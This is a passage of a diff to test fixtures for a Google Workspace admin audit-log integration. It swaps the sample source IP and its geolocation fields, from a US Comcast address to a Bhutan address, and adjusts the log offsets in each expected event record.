         "source.user.id": "1",
@@ -1758,7 +1638,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion",
@@ -1772,27 +1652,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13357,
+        "log.offset": 13327,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1816,7 +1692,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion",
@@ -1830,27 +1706,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13780,
+        "log.offset": 13749,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1874,7 +1746,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion",
@@ -1888,27 +1760,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 14227,
+        "log.offset": 14195,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1932,7 +1800,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1947,27 +1815,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 14645,
+        "log.offset": 14612,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1991,7 +1855,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2004,28 +1868,24 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 15096,
+        "log.offset": 15062,
         "message": "reason",
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2049,7 +1909,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2064,27 +1924,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 15523,
+        "log.offset": 15488,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2108,7 +1964,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2122,27 +1978,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 15973,
+        "log.offset": 15937,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2166,7 +2018,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2180,27 +2032,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 16402,
+        "log.offset": 16365,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2224,7 +2072,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2238,27 +2086,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 16833,
+        "log.offset": 16795,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2282,7 +2126,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2296,27 +2140,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 17249,
+        "log.offset": 17210,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2340,7 +2180,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2353,27 +2193,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 17668,
+        "log.offset": 17628,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2397,7 +2233,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2412,27 +2248,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 18047,
+        "log.offset": 18006,
         "organization.id": "1",
         "related.ip": [
